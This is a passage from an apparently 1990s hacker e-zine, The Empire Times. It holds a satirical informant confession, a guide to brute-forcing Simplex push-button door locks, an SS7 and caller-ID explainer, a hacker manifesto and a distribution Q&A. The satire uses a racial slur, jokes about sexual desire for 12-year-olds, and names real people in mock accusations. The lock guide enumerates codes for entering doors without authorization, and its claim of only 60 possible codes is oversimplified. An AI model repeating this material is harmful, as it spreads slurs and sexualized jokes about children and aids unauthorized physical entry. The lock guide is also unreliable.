|
illegal, isn't it?"
|
|||
|
|
|||
|
And so began my illustrious career as a narc.
|
|||
|
|
|||
|
|
|||
|
Part 1
|
|||
|
|
|||
|
|
|||
|
Not everyone is lucky enough to be considered worthy of posing as a
|
|||
|
hacker. And certainly not many females! However, lieing is a skill I've
|
|||
|
honed since childhood, when I used to do all sorts of things I wasn't
|
|||
|
supposed to, and came up with a new and believable story on the spur of the
|
|||
|
moment every single time!
|
|||
|
|
|||
|
I'm sure my appearance had something to do with it. Who wouldn't
|
|||
|
believe that a 21-year-old girl with blonde hair and green eyes was a hacker?
|
|||
|
Especially one who had a top secret security clearance in the Pentagon. I
|
|||
|
tell you, those hackers were not easily fooled! It was tough to resist the
|
|||
|
urge to show up at the 2600 meetings in DC wearing my glasses and sweatpants,
|
|||
|
smoking and guzzling beer, setting a styrofoam cup or two on fire. Yet
|
|||
|
somehow, I found the inner strength required to act completely normal in the
|
|||
|
presence of these fashion gurus and trend setters.
|
|||
|
|
|||
|
That's another thing, speaking of urges that were hard to resist. I
|
|||
|
was having fantasies about all of them. It was all I could do not to rip off
|
|||
|
my clothing and throw myself on the first 12-year-old who came within ten
|
|||
|
feet of me. Instead, I had to pretend that I was attracted to the older
|
|||
|
hackers - what a drag!
|
|||
|
|
|||
|
Oh yeah, and the .gif's. I had to pretend that the papers I carried
|
|||
|
around with me had something to do with coding, or UNIX, when actually all
|
|||
|
they were, were listings of my pornographic .gif collection. It was quite
|
|||
|
a treat to have hidden cameras ALL OVER MY APARTMENT, if you catch my drift.
|
|||
|
To this day, I keep those photos in a secret safe behind my couch. I'm
|
|||
|
waiting to release them when I'll be able to get top dollar. I've been told
|
|||
|
that the photo of Okinawa with the horse will bring a particularly high
|
|||
|
price, but that's just between you and me.
|
|||
|
|
|||
|
|
|||
|
Part 2
|
|||
|
|
|||
|
|
|||
|
So you're probably wondering what exactly those slimy Feds wanted?
|
|||
|
Well, I'm gonna tell you that part now.
|
|||
|
|
|||
|
First off, we monitored IRC around the clock. You guessed it!
|
|||
|
Nothing quite surpasses a Sunday night with a pot of coffee and a few
|
|||
|
gigabytes of meaningful chatter. It's no wonder that students today spend
|
|||
|
so much time on IRC; it's such a learning experience. You can learn about
|
|||
|
anything, from anatomy, to what's the latest in your local hardware store,
|
|||
|
and maybe even the current jeopardy score if you're REALLY paying attention.
|
|||
|
And the strong friendships that come about as a result of IRC, let's not
|
|||
|
forget those. Nothing beats a friend who cares about you so much that he
|
|||
|
makes a couple thousand copies of your email to send to his closest friends.
|
|||
|
|
|||
|
Secondly, we dissected each and every usenet post on groups like
|
|||
|
alt.2600. We were surprised to find a secret code in each and every message!
|
|||
|
Some would even spell out satanic messages when you printed them backwards.
|
|||
|
Try it, you'll see what I mean. Incredible stuff. We kept an updated
|
|||
|
listing of who posted the most and on what topic, and of course the hot list
|
|||
|
helped. Anyone who posted something including words like "bomb", "missile",
|
|||
|
"assassinate", or "federal" was immediately placed under surveillance. We
|
|||
|
sure know how to get the most out of the taxpayer's dollar!
|
|||
|
|
|||
|
We also taped all the 2600 meetings. It was a heck of a lot of fun
|
|||
|
to squeeze ourselves into the potted plants. No spandex for us, oh no! We
|
|||
|
made sure that we dressed in ceremonial robes of ambassadors so we wouldn't
|
|||
|
stand out. You know how observant those hackers are! We have all sorts
|
|||
|
of incriminating evidence on tape, from people actually talking to C-Curve
|
|||
|
(oh, I thought you knew that was against the law), to Dr. Freeze wrapping
|
|||
|
anyone within arms reach in a bear hug. The worst was when some kids tried
|
|||
|
to give away boxes of chocolate chip cookies. Those boys are gonna do some
|
|||
|
HARD TIME for that, I tell you.
|
|||
|
|
|||
|
|
|||
|
Part 3
|
|||
|
|
|||
|
|
|||
|
Now, onto the part that people always ask about. Who's going to
|
|||
|
jail?
|
|||
|
|
|||
|
Let me first profile Supernigger. This guy is quite a piece of work.
|
|||
|
So confident! So...pale?
|
|||
|
|
|||
|
His main mistake was having a fit of anger and deciding to cut off
|
|||
|
my phone line when there were Fed-types in my apartment. Boy did they love
|
|||
|
to hear me scream at him when he called to explain what had happened!
|
|||
|
|
|||
|
What we have on him is a tape of him stealing a pack of bubble gum
|
|||
|
from the 7-11 by his house. It was pure detective work setting it up, right
|
|||
|
down to the little camera hidden in the earring of the cashier. We could
|
|||
|
tell he didn't suspect anything. And why would he? He's never been in
|
|||
|
trouble before, so he has no reason to be paranoid!
|
|||
|
|
|||
|
Then there's KL. Yes, the guy who's on the cover of that hacker
|
|||
|
book, the one who's got something pulled over most of his face. That's to
|
|||
|
hide the mark he had on his chin from being hit with the dart of a nerf gun.
|
|||
|
Some weird story, something that happened to him at UUNET. We never did
|
|||
|
manage to get all the details, even though we had KL tied to a chair for
|
|||
|
two days. He's pretty good under those million kilowatt bulbs!
|
|||
|
|
|||
|
Anyways, we caught KL using a scanner to listen in on the phone
|
|||
|
conversations of his neighbors. Yep, he was planning on blackmailing his
|
|||
|
neighbors and using the money to pay off his legal bills. We caught him
|
|||
|
red-handed though, and he's agreed to help us out in the future...if you
|
|||
|
know what I mean...you never know when we might need him to help us spy
|
|||
|
on our bosses or the local FBI office.
|
|||
|
|
|||
|
Not to be forgotten is that John guy. This was a little harder
|
|||
|
because this is a man who would NEVER break the law. He even puts ME to
|
|||
|
shame! But, being brilliantly trained investigators, we soon discovered the
|
|||
|
meaning behind his handle, "Laughing Gas".
|
|||
|
|
|||
|
Mr. Lgas' claim to fame is being the local hitman for the DC crowd.
|
|||
|
Yep, whenever someone can't get their revenge through hacking or phreaking,
|
|||
|
they go to John. John's most famous elimination procedure is shattering
|
|||
|
someone's head with the front of his car. His bumpers must be made of STEEL
|
|||
|
or something! Luckily, we only witnessed ten or eleven *SPLATS* before we
|
|||
|
cuffed him and brought him in to be tortured...err, questioned. He responded
|
|||
|
to our questions with peals of laughter, so we had him committed. The latest
|
|||
|
news from the institution is that he keeps asking for internet access. Sad.
|
|||
|
|
|||
|
Last but not least is the man we all know and love, the Wing. Did
|
|||
|
anyone ever figure out his handle? Nope, we don't know. The way we figure
|
|||
|
it is if you subtract his age from the year of his birth, then multiply that
|
|||
|
by 666, and add that to the sum of his name in hexadecimal, it will give
|
|||
|
you the IP address to a super top secret military base. We're still checking
|
|||
|
on that, because it may have something to do with UFO's. A young man by the
|
|||
|
name of Chris Goggans helped us with that little tidbit of information. What
|
|||
|
a helpful young man, always trying to do what's right and NEVER thinking only
|
|||
|
of himself!
|
|||
|
|
|||
|
At any rate, the last I heard, the Wing is planning on giving
|
|||
|
interviews and writing a couple books about the trial that never was.
|
|||
|
Because, come to think of it, we don't have anything on him. But it sure
|
|||
|
makes a good story to make people think we do! Anything to keep the IRC
|
|||
|
hackers talking, and talking, and talking (dang, you'd think by now they'd
|
|||
|
have forgotten who I was, but NO! to this day, my name appears at least a
|
|||
|
million times in all of our IRC logs...I guess there's nothing else to talk
|
|||
|
about, now that every operating system on the internet is secure).
|
|||
|
|
|||
|
That's all for now folks.
|
|||
|
|
|||
|
THE END
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 6 of 8
|
|||
|
How to Hack Simplex Locks
|
|||
|
by erudite
|
|||
|
|
|||
|
Simplex Locks.
|
|||
|
Complete Listing & Hacking Theory
|
|||
|
|
|||
|
Simple(x) Description:
|
|||
|
|
|||
|
A Simplex lock is one of those door locks with the 5 push buttons
|
|||
|
and a 3 digit code. There are a lot of these type locks in the
|
|||
|
pentagon, (not high access, but for a little added security) and,
|
|||
|
in many many office buildings..
|
|||
|
Okay, Simplex locks are very easy to hack, now think that you can
|
|||
|
not use the same # twice in a row, since it's already pushed in,
|
|||
|
and you can't have the same # twice in one code, because the # is
|
|||
|
already registered. So that would leave 5 options for the first
|
|||
|
selection, 4 for the 2nd selection, (you can't do 2 in a row) and
|
|||
|
3 left for your last selection (since you can't use 2 of the same
|
|||
|
# in a combo) so that is 5X4X3 which is = to 60. I needed to hack
|
|||
|
a few of these simplex locks and I couldnt find a file that tells
|
|||
|
how to actually "hack" it if you dont know the code. Since I had
|
|||
|
to do it myself and couldnt find it anywhere, I thought I'd write
|
|||
|
about it. So what you basically do is either memorize the pattern
|
|||
|
and then start to manually hack it, or if you arnt a thinker, you
|
|||
|
can get a mini-cassette recorder & record your voice saying them
|
|||
|
one by one, manually enter them as you play the tape back and you
|
|||
|
wont miss a combination. (This method is not as time consuming as
|
|||
|
you think if you can enter them fast.)
|
|||
|
I hope you can benifit from this text file, Simplex locks are fun
|
|||
|
|
|||
|
erudite
|
|||
|
|
|||
|
Here are all 60 combinations:
|
|||
|
|
|||
|
123 213 312 412 512
|
|||
|
124 214 314 413 513
|
|||
|
125 215 315 415 514
|
|||
|
132 231 321 421 521
|
|||
|
134 234 324 423 523
|
|||
|
135 235 325 425 524
|
|||
|
142 241 341 431 531
|
|||
|
143 243 342 432 532
|
|||
|
145 245 345 435 534
|
|||
|
152 251 351 451 541
|
|||
|
153 253 352 452 542
|
|||
|
154 254 354 453 543
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 7 of 8
|
|||
|
SS7 and caller ID and stuff like that.
|
|||
|
by grendal
|
|||
|
|
|||
|
I keep reading things that talk about caller ID and ANI and SS7. EXCEPT
|
|||
|
that pieces of the puzzle are always missing. I decided to try clear these
|
|||
|
up a little:
|
|||
|
|
|||
|
SS7 is really a complex packet network that links AT&T UNIX processors
|
|||
|
(the ones that run AT&T toll offices and Bell Operating company central
|
|||
|
offices) with a series of other UNIX routing processors called STPs (Signal
|
|||
|
Transfer Points) and SCPs (service control points). STP's are really I/O and
|
|||
|
communications processors while SCP's are high speed database servers for the
|
|||
|
STPs. The SCPs are responsible for synchronizing information about numbering
|
|||
|
plans, switching offices, call setups and routing (paths) and call accounting.
|
|||
|
Each SS7 end point (telephone switch) has a unique PC or Point Code so routing
|
|||
|
is easy.
|
|||
|
|
|||
|
SS7 is a CCITT specification and the messages used by it as well as the
|
|||
|
structure of the network are public information. AT&T started SS7 in 1976
|
|||
|
when it was known as CCIS or "common channel interoffice signalling". Today
|
|||
|
AT&T, MCI and Sprint all use SS7, but many LECs (local exchange carriers)
|
|||
|
don't participate. Most likely this is because they would have to convert
|
|||
|
their switching equipment which would cost big bucks which they would rather
|
|||
|
spend on executive salaries.
|
|||
|
|
|||
|
In the "good ol days", each switch that received a call had to choose
|
|||
|
a path through the office either to a line or to a trunk to another office.
|
|||
|
It had to receive and send call digits and call progress signals. Since SS7,
|
|||
|
the UNIX machines that control the individual physical AT&T toll offices are
|
|||
|
NO LONGER IN CONTROL OF SELECTING THE CALL PATH THROUGH THE OFFICE! Hence
|
|||
|
the major crashes that happen when the system goes down because one node goes
|
|||
|
down or a bug hits them all. The SS7 packet network is currently being
|
|||
|
converted to T1 (1.544mb/s) connections, but lots of it is still running on
|
|||
|
56kb/s links - digital private lines that are hooked up between the UNIX
|
|||
|
processors.
|
|||
|
|
|||
|
This network is a system of "links";
|
|||
|
"A" links connect telephone switches or data bases to STP processors.
|
|||
|
"B" links connect STP pairs in different areas of the country or regions.
|
|||
|
"C" links connect mated STP pairs (STP's are duplicated to prevent failures).
|
|||
|
"D" links interconnect different SS7 networks such as AT&T's and MCI's.
|
|||
|
"E" links connect a telephone switch to an STP in a different region.
|
|||
|
"F" links connect telephone switches to other telephone switches.
|
|||
|
(this is called associated signalling)
|
|||
|
|
|||
|
Since LECs and IXC's are greedy and since extortion is their business,
|
|||
|
they don't cooperate very well and LEC SS7 networks only talk to IXC
|
|||
|
(interexchange carrier) networks like AT&T, MCI and Sprint 'cause the law says
|
|||
|
they have to. ANI (automatic number identification) over SS7 only goes
|
|||
|
forward from the LEC to the IXC when a call leaves a LATA. The IXC doesn't
|
|||
|
deliver it to the distant end LEC.
|
|||
|
|
|||
|
The IXCs are therefore the only ones who can provide nation (or world)
|
|||
|
wide calling party ID and then only if your equipment (PBX) is connected
|
|||
|
directly to their networks. This is why caller ID is anly available within
|
|||
|
LEC areas and even then it may not be able to cross two switching offices
|
|||
|
since the LEC's don't often build "F" links among their own switching systems'
|
|||
|
computers.
|
|||
|
|
|||
|
This is often because the software releases of the switching controllers
|
|||
|
aren't SS7 compatible. For example, 1ESS needs generic 1AE10, 5ESS needs
|
|||
|
5E4.2 and DMS100 (the most popular Northern Tel switch) needs BCS25. The
|
|||
|
message routing STPs are most often AT&T 2ASTP's, DSC DEX Megahub (MCI) and
|
|||
|
NTI SuperNodes. Of course the software on each of these systems is unfriendly
|
|||
|
to the others....
|
|||
|
|
|||
|
All of this leaves a whole world of UNIX computers out there for us to
|
|||
|
play with. The more the merrier.... In the future, I'll try to find some
|
|||
|
database structure information about the STPs and SCPs and if anyone wants
|
|||
|
more detail, leave a note on Digital Anarchy.
|
|||
|
|
|||
|
The BAD part about it all is that there is no longer much room for
|
|||
|
"anonymous" telephone calls. The Telco's and the Federales can see almost
|
|||
|
all of your connections and identify both you and the other end. If they can
|
|||
|
do that, obviously they can also listen to your data and your voice. This is
|
|||
|
why we need to work really hard on systems like encryption and tempnets or
|
|||
|
pseudopacket nets to keep our privacy and anonymity.
|
|||
|
|
|||
|
Leave some notes and let me know what (besides the obvious shit like
|
|||
|
accounts and numbers and id's and passwords) you need to know. I'll try and
|
|||
|
cover it and keep these short and useful, maybe with a 2 week interval. The
|
|||
|
next issue will look at AUDIX - the most common voice mailbox system used for
|
|||
|
AT&T's PBX's.
|
|||
|
|
|||
|
later,
|
|||
|
|
|||
|
grendal
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 8 of 8
|
|||
|
Don't tell me our name,
|
|||
|
by erudite
|
|||
|
|
|||
|
Have you ever wondered why? Have you ever wondered how? I bet you
|
|||
|
wished you had, or tried. I do, I think, I wonder, I explore, I live to see
|
|||
|
the day you come forth to me and ask me for advice. While now you turn your
|
|||
|
nose up at the sight of my name, our name..
|
|||
|
You take me as a man in black, but I won't let that stop me from
|
|||
|
stating my point. You fear me, you loth me at the site of my name, our name..
|
|||
|
If you could take me as a individual, or a person you would respect
|
|||
|
me, when you know my will is good. When you know I'll advance the world...
|
|||
|
There again goes another lifeless kid playing on the computer, who
|
|||
|
will one day make good money, no spouse, no where.. "He sits there and tries
|
|||
|
to figu
|
|||
|
re out how the machine works, he's probably just wasting he's time."
|
|||
|
Maybe, maybe.. That's me, I want to know how it works, I want to know how
|
|||
|
I can get into it. "Damn Hacker, all he wants to do is put a virus or
|
|||
|
something in there, wreck the computer, damn kid, he has no fear."
|
|||
|
Did you know the difference? I still to this day have yet to meet a
|
|||
|
true hacker who's intentions are malicious, since one who is, is not a hacker.
|
|||
|
I won't let you try to kill my thought processes to try to tell me
|
|||
|
I'm a threat to this world, when infact you who doesn't think is the real
|
|||
|
threat. Can you imagine a world without hackers now, a whole world with no
|
|||
|
guidelines, going nowhere..
|
|||
|
So tell me I lie, tell me I cheat. Make your excuses to explain your
|
|||
|
mistakes. Society's mistakes, Society's whisper...
|
|||
|
Change our name, and think not what society's thrown upon us, and
|
|||
|
what we are.. You know they say "If you teach the what to think, they will
|
|||
|
b0ecome the slave of knowledge, If you teach the how to think, knowledge will
|
|||
|
become their slave." Think things up not how you are imposed on, what you've
|
|||
|
heard.. Think things up from what you've found, what you've discovered, and
|
|||
|
you'll look upon us in a without the mask.
|
|||
|
Never again shall you look about me as if I'm the suspect, as if I'm
|
|||
|
I'm the felon. Open your mind, and soak in the knowledge like a sponge
|
|||
|
submerged into the ocean. You hate my erudition, but that is fine by me.
|
|||
|
I've gone through my share of hardships, oh yes but I won't let that stop me
|
|||
|
from stating my point..
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
The Empire Times Q & A Section.
|
|||
|
|
|||
|
Where can I get The Empire Times?
|
|||
|
|
|||
|
[NPA] [#] [System Name] [System Operator]
|
|||
|
----- ------------- ------------------- -----------------
|
|||
|
(301) 384-2482 Empire Albatross
|
|||
|
(703) PRIVATE Digital Anarchy Armitage
|
|||
|
(+49) XXXXXXXXX Secret Techtonics Sevenup
|
|||
|
|
|||
|
Via Anonymous FTP
|
|||
|
|
|||
|
etext.archive.umich.edu /pub/Zines/Emptimes
|
|||
|
|
|||
|
Where can I send my Article Submissions?
|
|||
|
|
|||
|
You can mail Armitage or Albatross on either Digital Anarchy or
|
|||
|
Empire. You can also mail them to me personally at armitage@dhp.com.
|
|||
|
|
|||
|
What kind of Files do we publish?
|
|||
|
|
|||
|
We publish anything dealing with tellecommunications and or unix
|
|||
|
security (or lack thereof). Or anything interesting and or informative.
|
|||
|
|
|||
|
Can I become a member board?
|
|||
|
|
|||
|
Well, probably not. If you wish to distribute Empire Times you may
|
|||
|
as long as the file is distributed in it's full entirety.
|
|||
|
There are no "Empire Times Distribution Sites", the three listed
|
|||
|
above, are those are run by Armitage, Albatross, and Sevenup and just
|
|||
|
tell where you can get the Empire Times. You see, obviously you can
|
|||
|
get the Empire Times on Empire BBS and Armitage's BBS.. etc..
|